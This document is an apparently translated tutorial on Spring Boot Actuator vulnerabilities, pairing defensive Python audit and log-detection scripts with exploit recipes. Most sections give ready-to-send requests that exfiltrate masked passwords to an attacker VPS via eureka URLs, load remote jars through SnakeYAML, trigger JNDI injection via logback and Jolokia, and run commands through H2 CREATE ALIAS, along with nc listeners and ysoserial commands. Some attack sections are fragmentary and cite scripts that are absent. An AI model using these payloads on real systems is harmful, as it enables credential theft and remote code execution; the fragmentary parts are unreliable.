Introduction to Spring Boot Related Vulnerabilities

Routing Knowledge

  • In Spring Boot 1.x the default built-in routes start at the root path (/); in 2.x they start at /actuator.
  • Some programmers customize the root path to /manage, /management, or a project-related name.
  • Default built-in route names such as /env are sometimes renamed by the programmer, for example to /appenv.

Version Knowledge

Spring Cloud builds services based on Spring Boot and provides an ordered collection of frameworks that help to rapidly develop distributed systems with common functions such as configuration management, service registration and discovery, and intelligent routing.

Version Interdependencies of Common Components:

dependencies               | Version list and dependent component versions
spring-boot-starter-parent | spring-boot-starter-parent
spring-boot-dependencies   | spring-boot-dependencies
spring-cloud-dependencies  | spring-cloud-dependencies

Information Leakage

Leakage of routing address and interface call details

  • When the development environment was switched to the online production environment, the responsible staff did not change the configuration file or forgot to switch the configuration profile, resulting in this vulnerability

Route Exposed by Improper Configuration

  • Mainly because programmers did not realize, while developing, that exposing routes can create security risks, or did not follow standard procedures and forgot to modify/switch the production configuration when going live
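As an added example (not code from the original article), the following Python script reads a constructed application.properties and flags the settings that open management routes in the way this section describes, then shows the same file after remediation. The property keys in CHECKS are real Spring Boot 1.x/2.x and Spring Cloud keys; the sample file contents and the remediation hints are this example's own.

```python
"""Audit a Spring Boot application.properties for settings that expose management routes.

Added example, not code from the original article.  The keys in CHECKS are real
Spring Boot 1.x/2.x and Spring Cloud property names; the sample file contents and
the remediation hints are constructed for this demo.
"""
import re

# key=value or key: value; lines starting with '#' or '!' are comments
PROP_RE = re.compile(r"^\s*([^=:\s#!][^=:\s]*)\s*[=:]\s*(.*?)\s*$")

# Endpoints whose HTTP exposure the techniques in the article rely on.
SENSITIVE_ENDPOINTS = {"*", "env", "jolokia", "heapdump", "httptrace", "trace", "refresh", "restart"}


def _exposes_sensitive(value):
    """True when the 2.x exposure list opens any of the sensitive endpoints."""
    return bool({e.strip() for e in value.split(",")} & SENSITIVE_ENDPOINTS)


def _is_true(value):
    return value.strip().lower() == "true"


def _is_false(value):
    return value.strip().lower() == "false"


# (property key, predicate that marks the value as risky, remediation hint)
CHECKS = [
    ("management.endpoints.web.exposure.include", _exposes_sensitive,
     "expose only health,info over HTTP (Spring Boot 2.x)"),
    ("management.security.enabled", _is_false,
     "keep management security on (Spring Boot 1.x)"),
    ("endpoints.sensitive", _is_false,
     "leave sensitive endpoints protected (Spring Boot 1.x)"),
    ("spring.h2.console.enabled", _is_true,
     "disable the H2 console outside local development"),
    ("management.endpoint.env.post.enabled", _is_true,
     "do not allow POST /actuator/env (Spring Cloud writable env endpoint)"),
    ("management.endpoint.restart.enabled", _is_true,
     "disable /actuator/restart unless an authenticated operator needs it (Spring Cloud)"),
]


def parse_properties(text):
    """Minimal .properties parser: returns {key: value}, comments and blanks ignored."""
    props = {}
    for line in text.splitlines():
        m = PROP_RE.match(line)
        if m:
            props[m.group(1)] = m.group(2)
    return props


def audit(props):
    """Return (key, value, remediation) for every risky setting present in props."""
    return [(key, props[key], fix) for key, risky, fix in CHECKS
            if key in props and risky(props[key])]


# Constructed sample: a development profile shipped to production unchanged.
WEAK_PROPERTIES = """\
# constructed sample, not a real deployment
management.endpoints.web.exposure.include=*
management.endpoint.env.post.enabled=true
spring.h2.console.enabled=true
server.port=8080
"""

# Constructed sample: the same file after remediation.
HARDENED_PROPERTIES = """\
management.endpoints.web.exposure.include=health,info
management.endpoint.env.post.enabled=false
spring.h2.console.enabled=false
server.port=8080
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_PROPERTIES), ("hardened", HARDENED_PROPERTIES)):
        findings = audit(parse_properties(text))
        print(f"{name}: {len(findings)} finding(s)")
        for key, value, fix in findings:
            print(f"  {key}={value}  ->  {fix}")
```

The checks only report keys that are explicitly present, so a file that relies on defaults is not audited for them; run it against the effective configuration of each profile that reaches production.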

/env,/actuator/env

  • A GET request to /env leaks environment variable information and some usernames from the configuration. When the programmer's attribute names are not standardized (for example, a password stored under passwords or PWD), the password is leaked in plaintext.
  • At the same time, there is some chance that attributes can be set through a POST request to the /env interface, which is the starting point of the related RCE vulnerabilities.
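The plaintext leak described in the first bullet, and worked around by the four "desensitized by the asterisk" methods further down, comes from the way the env endpoint decides which keys to mask. As an added example (not code from the article or from Spring), the following Python reimplements that rule so property names can be audited before deployment. The keyword list and the "key ends with keyword" matching are modelled on the Sanitizer used by the Spring Boot 1.x/2.x env endpoint; treat the exact list as an assumption and compare it with the version you run. The sample property map is constructed.

```python
"""Check which property names the actuator would mask before they are shown by GET /env.

Added example, not code from the original article.  The keyword list and the
matching rule are modelled on the Sanitizer used by the Spring Boot 1.x/2.x env
endpoint (a plain keyword masks any key that ends with it, case-insensitively;
an entry containing regex metacharacters is used as a whole pattern).  Treat
the list as an assumption and compare it with the Spring Boot version you run.
"""
import re

DEFAULT_KEYS_TO_SANITIZE = ("password", "secret", "key", "token",
                            ".*credentials.*", "vcap_services", "sun.java.command")
REGEX_PARTS = ("*", "$", "^", "+")   # an entry containing one of these is a regex


def compile_patterns(keys=DEFAULT_KEYS_TO_SANITIZE):
    """Turn the keyword list into the patterns the Sanitizer would apply."""
    patterns = []
    for key in keys:
        if any(part in key for part in REGEX_PARTS):
            patterns.append(re.compile(key, re.IGNORECASE))
        else:
            patterns.append(re.compile(".*" + key + "$", re.IGNORECASE))
    return patterns


DEFAULT_PATTERNS = compile_patterns()


def is_masked(key, patterns=DEFAULT_PATTERNS):
    """True when the env endpoint would replace this key's value with ******."""
    return any(p.fullmatch(key) for p in patterns)


def sanitize(properties, patterns=DEFAULT_PATTERNS):
    """Return a copy of the property map as GET /env would display it."""
    return {k: ("******" if is_masked(k, patterns) else v) for k, v in properties.items()}


def unmasked_credential_names(properties, patterns=DEFAULT_PATTERNS):
    """Keys that look like credentials by name but would still be shown in plaintext.
    The name heuristic (pass/pwd/secret/token/credential) is this example's own,
    not a Spring rule."""
    looks_secret = re.compile(r"pass|pwd|secret|token|credential", re.IGNORECASE)
    return sorted(k for k in properties
                  if looks_secret.search(k) and not is_masked(k, patterns))


# Constructed sample property map (not from any real deployment).
SAMPLE_PROPERTIES = {
    "security.user.password": "s3cr3t",          # standard name: masked
    "spring.datasource.passwords": "db-pass",    # non-standard plural: shown in plaintext
    "db.PWD": "db-pass",                         # abbreviation: shown in plaintext
    "api.client.secret": "abc123",               # masked
    "aws.credentials.json": "<json blob>",       # matched by .*credentials.*
    "server.port": "8080",                       # not a secret
}

if __name__ == "__main__":
    for key, value in sanitize(SAMPLE_PROPERTIES).items():
        print(f"{key} = {value}")
    print("would leak in plaintext:", unmasked_credential_names(SAMPLE_PROPERTIES))
```

Because the default rule is a suffix match, a key such as spring.datasource.passwords or db.PWD is shown unmasked; renaming the key or adding its pattern to the endpoint's keys-to-sanitize setting closes that gap, and the script gives a quick list of the candidates.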

/jolokia

  • Find exploitable MBeans through the /jolokia/list interface to trigger related RCE vulnerabilities;

/trace

  • Contains tracing information for some HTTP requests; valid cookie information may be found in it

Obtain the Plaintext of the Password Desensitized by the Asterisk (method 1)

  • When accessing the /env interface, the Spring actuator replaces the values of attributes whose names contain sensitive keywords (such as password, secret) with * to desensitize them
  • The target uses the jolokia-core dependency (version requirements are currently unknown)

POST /jolokia
Content-Type: application/json

{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin", "operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}

POST /actuator/jolokia
Content-Type: application/json

{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin", "operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}

  • In fact, this calls the getProperty method of the org.springframework.cloud.context.environment.EnvironmentManager class instance; the same call against that MBean:

POST /jolokia
Content-Type: application/json

{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager", "operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}

POST /actuator/jolokia
Content-Type: application/json

{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager", "operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}

Obtain the Plaintext of the Password Desensitized by the Asterisk (method 2)

When accessing the /env interface, the spring actuator will replace the attribute values ​​corresponding to some attribute names with sensitive keywords (such as password, secret) with * to achieve the effect of desensitization

  • Properties can be set by POST request to the target's /env interface
  • The configuration can be refreshed by POST request to the /refresh interface (the spring-boot-starter-actuator dependency exists)
  • The target uses the spring-cloud-starter-netflix-eureka-client dependency.
  • The target can reach the attacker's server (outbound Internet requests are possible)

nc -lvk 80

POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://value:${security.user.password}@your-vps-ip

POST /actuator/env
Content-Type: application/json

{"name":"eureka.client.serviceUrl.defaultZone","value":"http://value:${security.user.password}@your-vps-ip"}

POST /refresh
Content-Type: application/x-www-form-urlencoded

POST /actuator/refresh
Content-Type: application/json

The listener then receives a request whose Basic Authorization header carries the resolved password (value:123456 here):

Authorization: Basic dmFsdWU6MTIzNDU2

Obtain the Plaintext of the Password Desensitized by the Asterisk (method 3)

When accessing the /env interface, the spring actuator will replace the attribute values ​​corresponding to some attribute names with sensitive keywords (such as password, secret) with * to achieve the effect of desensitization

  • The target can request the attacker’s server (the request can go out of the Internet)
nc -lvk 80

POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://your-vps-ip/${security.user.password}

POST /actuator/env
Content-Type: application/json

{"name":"spring.cloud.bootstrap.location","value":"http://your-vps-ip/?=${security.user.password}"}

POST /actuator/env
Content-Type: application/json

{"name":"eureka.client.serviceUrl.defaultZone","value":"http://your-vps-ip/${security.user.password}"}

POST /refresh
Content-Type: application/x-www-form-urlencoded

POST /actuator/refresh
Content-Type: application/json

Obtain the Plaintext of the Password Desensitized by the Asterisk (method 4)

  • When accessing the /env interface, the spring actuator will replace the attribute values ​​corresponding to some attribute names with sensitive keywords (such as password, secret) with * to achieve the effect of desensitization
  • A GET request to the target's /heapdump or /actuator/heapdump interface downloads the application's live JVM heap dump

Remote Code Execution

Because Spring Boot-related vulnerabilities may arise from a combination of several component vulnerabilities, some of the names below are informal; they are chosen only so the cases can be told apart.

White Label Error Page SpEL RCE

Conditions of use:

# coding: utf-8

# Encode each character of the command as a comma-separated hex code point
result = ""
target = 'open -a Calculator'
for x in target:
    result += hex(ord(x)) + ","
print(result.rstrip(','))

  • At this point, the parameter value in the URL is parsed recursively by the parseStringValue method
  • The content enclosed in ${} is resolved and executed as a SpEL expression by the resolvePlaceholder method of org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration, resulting in an RCE vulnerability

Vulnerability Analysis:

http://127.0.0.1:9091/article?id=66

Spring Cloud SnakeYAML RCE

Conditions of use:

  • The configuration can be refreshed by POST request to the /refresh interface (the spring-boot-starter-actuator dependency exists)
  • The target's spring-cloud-starter dependency version is < 1.3.0.RELEASE
  • The target can reach the attacker's HTTP server (outbound Internet requests are possible)

# Use python to quickly start the http server
python2 -m SimpleHTTPServer 80
python3 -m http.server 80

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://your-vps-ip/example.jar"]
  ]]
]

POST /env
Content-Type: application/x-www-form-urlencoded

spring.cloud.bootstrap.location=http://your-vps-ip/example.yml

POST /actuator/env
Content-Type: application/json

{"name":"spring.cloud.bootstrap.location","value":"http://your-vps-ip/example.yml"}

POST /refresh
Content-Type: application/x-www-form-urlencoded

POST /actuator/refresh
Content-Type: application/json

Vulnerability Principle:

  • The spring.cloud.bootstrap.location property is set to the URL address of the external malicious yml file
  • refresh triggers the target machine to request the yml file on the remote HTTP server and get its content
  • SnakeYAML has a deserialization vulnerability, so it will complete the specified action when parsing malicious yml content
  • First, trigger java.net.URL to pull the malicious jar file on the remote HTTP server
  • Then look for the class in the jar file that implements the javax.script.ScriptEngineFactory interface and instantiate it
  • Execute malicious code when instantiating a class, causing RCE vulnerability
http://127.0.0.1:9092/env

Eureka XStream Deserialization RCE

Conditions of use:

  • Properties can be set by POST request to the /env interface
  • The configuration can be refreshed by POST request to the /refresh interface (the spring-boot-starter-actuator dependency exists)
  • The target uses eureka-client < 1.8.7 (usually included through the spring-cloud-starter-netflix-eureka-client dependency)
  • The target can reach the attacker's HTTP server (outbound Internet requests are possible)
  • Run the above script with python on a server you control, adjusting the IP address and port of the reverse shell in the script to the actual situation.

nc -lvp 443

POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://your-vps-ip/example

POST /actuator/env
Content-Type: application/json

{"name":"eureka.client.serviceUrl.defaultZone","value":"http://your-vps-ip/example"}

POST /refresh
Content-Type: application/x-www-form-urlencoded

POST /actuator/refresh
Content-Type: application/json

Vulnerability Principle:

  • The eureka.client.serviceUrl.defaultZone property is set to the malicious external eureka server URL address
  • refresh triggers the target machine to request a remote URL, and the fake eureka server set up in advance will return a malicious payload
  • The target's dependency parses the payload, triggering XStream deserialization and resulting in an RCE vulnerability

http://127.0.0.1:9093/env

Jolokia Logback JNDI RCE

Conditions of use:

  • The target uses the jolokia-core dependency (version requirements are currently unknown) and the related MBeans exist in the environment
  • The target can reach the attacker's HTTP server (outbound Internet requests are possible)
  • JNDI injection depends on the target's JDK version: JDK < 6u201/7u191/8u182/11.0.1 (LDAP method)

# Use python to quickly start the http server
python2 -m SimpleHTTPServer 80
python3 -m http.server 80

<configuration>
  <insertFromJNDI env-entry-name="ldap://your-vps-ip:1389/JNDIObject" as="appName"/>
</configuration>

javac -source 1.5 -target 1.5 JNDIObject.java

nc -lv 443

Vulnerability Principle:

  • Directly accessing the triggering URL is equivalent to calling the reloadByURL method of the ch.qos.logback.classic.jmx.JMXConfigurator class through jolokia
  • The target machine requests the URL of the external log configuration file and obtains the content of the malicious xml file.
  • The target machine parses the xml file with saxParser.parse (which also leads to an XXE vulnerability)
  • The external JNDI server address is set with the insertFromJNDI tag of the logback xml file
  • The target machine requests the malicious JNDI server, resulting in JNDI injection and an RCE vulnerability

Vulnerability Analysis:

http://127.0.0.1:9094/env

Jolokia Realm JNDI RCE

Conditions of use:

  • The target uses the jolokia-core dependency (version requirements are currently unknown) and the related MBeans exist in the environment
  • The target can reach the attacker's server (outbound Internet requests are possible)
  • JNDI injection depends on the target's JDK version: JDK < 6u141/7u131/8u121 (RMI method)

# Use python to quickly start the http server
python2 -m SimpleHTTPServer 80
python3 -m http.server 80

nc -lvp 443

Vulnerability principle:

  • Use jolokia to call createJNDIRealm to create JNDIRealm
  • Set the connectionURL address to RMI Service URL
  • Set context factory to RegistryContextFactory
  • Stop Realm
  • Start Realm to trigger JNDI injection of specified RMI address, causing RCE vulnerability

Vulnerability Analysis:

http://127.0.0.1:9094/env

h2 Database Query RCE

Conditions of use:

  • The application can be restarted by POST request to the /restart interface (the spring-boot-starter-actuator dependency exists)
  • The com.h2database.h2 dependency exists (version requirements are currently unknown)

POST /env
Content-Type: application/x-www-form-urlencoded

spring.datasource.hikari.connection-test-query=CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');

POST /actuator/env
Content-Type: application/json

{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');"}

Spring 1.x:

POST /restart
Content-Type: application/x-www-form-urlencoded

Spring 2.x:

POST /actuator/restart
Content-Type: application/json

Vulnerability Principle:

  • The spring.datasource.hikari.connection-test-query property is set to a malicious SQL statement that creates a custom function with CREATE ALIAS
  • This property corresponds to the connectionTestQuery setting of the HikariCP connection pool and defines the SQL statement executed before a new database connection is handed out
  • restart restarts the application, and a new database connection is established
  • If the custom function in the SQL statement has not yet been executed, it is executed now, resulting in an RCE vulnerability

Vulnerability Analysis:

http://127.0.0.1:9096/actuator/env

h2 Database Console JNDI RCE

Conditions of use:

  • Enable h2 console in spring configuration spring.h2.console.enabled=true
  • The target can request the attacker’s server (the request can go out of the Internet)
  • JNDI injection is affected by the target JDK version, jdk < 6u201/7u191/8u182/11.0.1 (LDAP method)
javac -source 1.5 -target 1.5 JNDIObject.java

# Use python to quickly start the http server
python2 -m SimpleHTTPServer 80
python3 -m http.server 80

nc -lv 443

Vulnerability Analysis:

http://127.0.0.1:9096/h2-console

MySQL Jdbc Deserialization RCE

Conditions of use:

  • The configuration can be refreshed by POST request to the /refresh interface (the spring-boot-starter-actuator dependency exists)
  • The mysql-connector-java dependency exists
  • The target can reach the attacker's server (outbound Internet requests are possible)
  • Check whether common deserialization gadget dependencies are present in the environment variables, such as commons-collections, Jdk7u21, Jdk8u20, etc.
  • Search for the spring.datasource.url keyword and record its value so that the normal JDBC url can be restored afterwards.

java -jar ysoserial.jar CommonsCollections3 calc > payload.ser

POST /env
Content-Type: application/x-www-form-urlencoded

spring.datasource.url=corresponding property value

POST /refresh
Content-Type: application/x-www-form-urlencoded

POST /actuator/refresh
Content-Type: application/json

Vulnerability principle:

  • The spring.datasource.url property is set to the URL of an external malicious MySQL JDBC server
  • refresh applies the new spring.datasource.url property value
  • When the website performs a database query or similar operation, it tries to establish a new database connection using the malicious MySQL JDBC URL
  • At the appropriate stage of connection establishment, the malicious MySQL server returns the serialized payload data
  • The mysql-connector-java dependency on the target deserializes the gadget, resulting in an RCE vulnerability

Vulnerability Analysis:

http://127.0.0.1:9097/actuator/env
http://127.0.0.1:9097/product/list
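Every RCE technique above except the error-page SpEL case follows the same shape on the wire: a POST to /env (or /actuator/env) followed shortly by a POST to /refresh or /restart from the same client, while the information-leakage section relies on GET requests to /env, /heapdump, /trace and /jolokia. As an added example (not code from the article or from any of the projects it names), the following Python runs that detection logic over constructed access-log lines in combined log format, scoring single requests and flagging the env-then-refresh/restart chain per source address. The management prefix list follows the Routing Knowledge section; a renamed endpoint such as /appenv would need its own entry.

```python
"""Flag actuator abuse in HTTP access logs, including the POST /env -> POST /refresh|/restart
chain that the RCE techniques above share.

Added example, not code from the original article.  Log lines below are constructed
in combined log format; the management prefixes follow the Routing Knowledge section.
"""
import re
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

MANAGEMENT_PREFIXES = ("/actuator", "/management", "/manage")   # 2.x default and common custom roots
WRITE_ENDPOINTS = {"/env", "/refresh", "/restart", "/jolokia"}   # POST here changes state or runs MBeans
READ_ENDPOINTS = {"/env", "/heapdump", "/trace", "/httptrace", "/jolokia"}  # GET here discloses data


def endpoint_of(path):
    """Strip the query string and a management prefix, keep the first path segment."""
    p = path.split("?", 1)[0].rstrip("/") or "/"
    for prefix in MANAGEMENT_PREFIXES:
        if p == prefix or p.startswith(prefix + "/"):
            p = p[len(prefix):] or "/"
            break
    return "/" + p.split("/")[1]


def classify(method, path):
    """Severity of one request, or None when it does not touch a management route."""
    endpoint = endpoint_of(path)
    if endpoint == "/h2-console":
        return "high"
    if method == "POST" and endpoint in WRITE_ENDPOINTS:
        return "critical"
    if method == "GET" and endpoint in READ_ENDPOINTS:
        return "high"
    return None


def detect(lines, window_seconds=300):
    """Return (events, chains).
    events: (ip, method, path, severity) for every flagged request;
    chains: (ip, path, seconds) when a POST to /refresh or /restart follows a POST
    to /env from the same client within window_seconds."""
    events, chains, last_env_post = [], [], {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        severity = classify(m["method"], m["path"])
        if severity is None:
            continue
        events.append((m["ip"], m["method"], m["path"], severity))
        ts = datetime.strptime(m["ts"], TS_FMT)
        endpoint = endpoint_of(m["path"])
        if m["method"] == "POST" and endpoint == "/env":
            last_env_post[m["ip"]] = ts
        elif m["method"] == "POST" and endpoint in ("/refresh", "/restart"):
            started = last_env_post.get(m["ip"])
            if started is not None and 0 <= (ts - started).total_seconds() <= window_seconds:
                chains.append((m["ip"], m["path"], (ts - started).total_seconds()))
    return events, chains


# Constructed sample log (combined log format); addresses are from documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2023:10:00:01 +0000] "GET /actuator/env HTTP/1.1" 200 5123
203.0.113.7 - - [10/Mar/2023:10:00:09 +0000] "POST /actuator/env HTTP/1.1" 200 41
203.0.113.7 - - [10/Mar/2023:10:00:12 +0000] "POST /actuator/refresh HTTP/1.1" 200 17
198.51.100.2 - - [10/Mar/2023:10:01:00 +0000] "GET /product/list HTTP/1.1" 200 830
198.51.100.2 - - [10/Mar/2023:10:01:03 +0000] "GET /jolokia/list HTTP/1.1" 200 9000
198.51.100.2 - - [10/Mar/2023:10:01:10 +0000] "GET /manage/heapdump HTTP/1.1" 200 10485760
"""

if __name__ == "__main__":
    events, chains = detect(SAMPLE_LOG.splitlines())
    for ip, method, path, severity in events:
        print(f"{severity:8} {ip} {method} {path}")
    for ip, path, seconds in chains:
        print(f"CHAIN    {ip} POST /env followed by POST {path} after {seconds:.0f}s")
```

Access logs usually do not record request bodies, so the script cannot see which property was written; a chain hit is the signal to pull the body from a reverse proxy or WAF log and to compare the live environment (GET /env on an authenticated channel) against the deployed configuration.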
